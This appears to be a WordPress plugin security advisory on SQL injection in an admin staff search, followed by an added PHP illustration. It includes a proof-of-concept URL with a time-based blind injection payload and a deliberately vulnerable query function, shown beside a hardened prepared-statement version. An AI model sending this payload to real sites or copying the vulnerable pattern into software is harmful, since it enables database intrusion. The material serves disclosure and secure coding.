The plugin does not properly sanitise and escape a parameter before using it in a SQL statement when searching for Staff in the admin dashboard, leading to an SQL Injection.
https://example.com/wp-admin/admin.php?page=stafflist&search=test%'+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)+AND+'aa%'='aa
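As an added illustration (not the plugin's own code, which the advisory does not show), the unsafe query pattern this advisory describes beside a hardened version that uses WordPress's `$wpdb->prepare()` and `$wpdb->esc_like()`; the `staff` table, its `name` column, the `search` parameter handling and the function names are assumptions.

```php
<?php
// Added illustration, not the affected plugin's code. It assumes a custom
// table {prefix}staff with a `name` column and a `search` GET parameter on
// the admin staff-list page, as in the advisory's PoC URL.

// VULNERABLE pattern: the raw search term is concatenated into the LIKE
// clause. A value such as  test%' AND (SELECT ...) AND 'aa%'='aa  closes the
// quoted pattern and appends attacker-controlled SQL (time-based blind here).
function staff_search_vulnerable( $search ) {
    global $wpdb;
    $table = $wpdb->prefix . 'staff';
    $sql   = "SELECT * FROM {$table} WHERE name LIKE '%{$search}%'";
    return $wpdb->get_results( $sql );
}

// HARDENED pattern: the term is unslashed and sanitised, LIKE metacharacters
// (% and _) are escaped with esc_like(), and the value is bound through
// $wpdb->prepare(), so it can only ever be matched as a string, never parsed
// as SQL.
function staff_search_hardened( $search ) {
    global $wpdb;
    $table   = $wpdb->prefix . 'staff';
    $term    = sanitize_text_field( wp_unslash( $search ) );
    $pattern = '%' . $wpdb->esc_like( $term ) . '%';
    $sql     = $wpdb->prepare( "SELECT * FROM {$table} WHERE name LIKE %s", $pattern );
    return $wpdb->get_results( $sql );
}

// Hypothetical admin-page handler: gate on capability so only an intended
// administrator request reaches the query, then use the hardened search.
function staff_list_admin_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $search = isset( $_GET['search'] ) ? $_GET['search'] : '';
    $rows   = staff_search_hardened( $search );
    foreach ( $rows as $row ) {
        echo '<li>' . esc_html( $row->name ) . '</li>';
    }
}
```

With the hardened version, the PoC value from the advisory is matched literally (its `%` and `'` characters are escaped or quoted), so the injected `SLEEP(5)` never executes and the request returns immediately.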